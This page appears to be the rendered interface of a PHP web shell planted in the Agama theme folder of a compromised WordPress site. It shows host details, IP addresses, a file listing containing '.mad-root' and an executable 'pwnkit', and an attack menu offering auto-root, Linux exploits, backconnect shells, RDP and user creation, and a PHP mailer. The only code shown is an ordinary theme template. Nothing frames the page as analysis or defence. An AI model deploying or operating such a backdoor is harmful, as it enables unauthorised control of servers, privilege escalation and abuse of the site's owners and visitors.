Linux webd002.cluster130.gra.hosting.ovh.net 6.18.39-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Tue Jul 21 12:03:15 CEST 2026 x86_64
Apache
: 10.130.40.2 | : 216.73.217.172
Cant Read [ /etc/named.conf ]
8.3.31
espacpq
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
espacpq /
www /
wp-content /
themes /
agama /
[ HOME SHELL ]
Name
Size
Permission
Action
assets
[ DIR ]
drwxr-xr-x
framework
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
template-parts
[ DIR ]
drwxr-xr-x
templates
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
README.txt
23.33
KB
-rw-r--r--
author.php
4.52
KB
-rw-r--r--
bbpress.php
886
B
-rw-r--r--
category.php
1.25
KB
-rw-r--r--
comments.php
2.22
KB
-rw-r--r--
editor-style-rtl.css
382
B
-rw-r--r--
editor-style.css
5.35
KB
-rw-r--r--
footer.php
953
B
-rw-r--r--
functions.php
1.54
KB
-rw-r--r--
header.php
1.85
KB
-rw-r--r--
image.php
6.37
KB
-rw-r--r--
index.php
967
B
-rw-r--r--
license.txt
17.69
KB
-rw-r--r--
page.php
708
B
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
rtl.css
5.51
KB
-rw-r--r--
screenshot.png
289.73
KB
-rw-r--r--
searchform.php
666
B
-rw-r--r--
sidebar.php
814
B
-rw-r--r--
style.css
90.01
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : bbpress.php
<?php /** * The main template for bbPress * * @author Theme Vision <support@theme-vision.com> * @package Agama * @since 1.0.2 */ // Do not allow direct access to the file. if( ! defined( 'ABSPATH' ) ) { exit; } get_header(); ?> <div id="primary" class="site-content <?php echo esc_attr( Agama::bs_class() ); ?>"> <div id="content" role="main"> <?php if( have_posts() ): the_post(); ?> <div id="post-<?php the_ID(); ?>" <?php post_class(); ?>> <div class="post-content"> <?php the_content(); ?> <?php wp_link_pages( array( 'before' => '<div class="page-links">' . __( 'Pages:', 'agama' ), 'after' => '</div>' ) ); ?> </div> </div> <?php endif; ?> </div><!-- #content --> </div><!-- #primary --> <?php get_sidebar(); ?> <?php get_footer(); ?>
Close